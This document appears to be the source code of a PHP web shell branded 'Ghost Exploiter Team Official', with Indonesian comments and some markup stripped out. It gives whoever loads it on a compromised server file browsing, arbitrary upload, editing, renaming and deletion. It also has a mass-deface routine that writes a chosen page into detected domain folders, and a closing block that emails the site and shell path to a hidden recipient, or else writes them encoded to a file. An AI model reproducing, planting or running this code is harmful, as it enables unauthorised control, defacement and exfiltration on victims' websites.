Ghost Exploiter Team Official
$value) {
if ($value == "" && $key == 0){
echo '
Directory >> /'; continue;
} echo ''.$value.'/';
}
echo '
';
if (isset($_POST['submit'])){
$namafile = $_FILES['upload']['name'];
$tempatfile = $_FILES['upload']['tmp_name'];
$tempat = $_GET['dir'];
$error = $_FILES['upload']['error'];
$ukuranfile = $_FILES['upload']['size'];
move_uploaded_file($tempatfile, $dir.'/'.$namafile);
echo "
";
}
?>
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
";
?>
File / Folder |
Size |
Action |
. |
- |
';
?>
|
'.dirlimit($directory).'
|
-- |
';
echo '';
echo '
|
';
}
foreach ($scan as $file) {
if (!is_file($dir.'/'.$file)) continue;
$jumlah = filesize($dir.'/'.$file)/1024;
$jumlah = round($jumlah, 3);
if ($jumlah >= 1024) {
$jumlah = round($jumlah/1024, 2).'MB';
} else {
$jumlah = $jumlah .'KB';
}
echo '
'.wordlimit($file).' |
'.$jumlah.' |
';
echo '';
echo '
|
';
}
echo '
';
/*action*/
if (isset($_GET['open'])) {
echo '
';
}
if (isset($_POST['rmfile'])) {
if (unlink($_POST['filedl'])) {
echo "";
}
}
if (isset($_POST['rmdir'])){
if(rmdir($_POST['dirdl'])){
echo "";
}
}
if(isset($_GET['ubah'])){
if(isset($_POST['edit'])){
$fp = fopen($_POST['object'], 'w');
if(fwrite($fp,$_POST['edit'])){
echo "";
}else{
err();
}
fclose($fp);
}
$hell = $_GET['dir'];
$yeah = $_GET['ubah'];
$patc = "$hell/$yeah";
echo '
';
}
if(isset($_POST['newname'])){
if(rename($_POST['path'].'/'.$_POST['oldname'], $_POST['path'] . '/' .$_POST['newname'])){
ok();
}else{
err();
}
}
if(isset($_POST['newfile'])){
$newfl = $dir. '/' . $_POST['newflname'];
if(isset($newfl)){
if(fopen($newfl,'w')){
ok();
}else{
err();
}
}
}
if(isset($_POST['massdef'])){
echo '';
$nama = $_POST['namasc'];
$sc = $_POST['scdeface'];
$bikin = fopen($nama, "w");
fwrite($bikin, $sc);
fclose($bikin);
$root = $_POST['pwd'];
$scan = scandir($root);
echo "";
echo "[ DETECTED DOMAINS ] :
";
echo "
";
}
/*function*/
function wordlimit($file,$limit=26){
if(strlen($file)>$limit)
$word = mb_substr($file,0,$limit-3)."...";
else
$word = $file;
return $word;
}
function dirlimit($directory,$limit=22){
if(strlen($directory)>$limit)
$dirlim = mb_substr($directory,0,$limit-3)."...";
else
$dirlim = $directory;
return $dirlim;
}
function ok(){
echo "";
}
function err(){
echo "";
}
function clearspace($directory){
return str_replace(" ","_",$directory);
}
function clearfile($file){
return str_replace(" ","_",$file);
}
?>
Website : $web
Filepath : $web$file
";
//ini kalo gak ada fitur mailer :v
if(!mail($email, $sub, $uatama, $from)){
$newfl = $root. '/' . "webdocs.txt";
$pesta = "IP : $ipz\n\nFilepath : $web$file\nPeace :p";
if(isset($newfl)){
$write = fopen($newfl,'w');
$txt = base64_encode(str_rot13($pesta));
fwrite($write, $txt);
fclose($write);
}
};
?>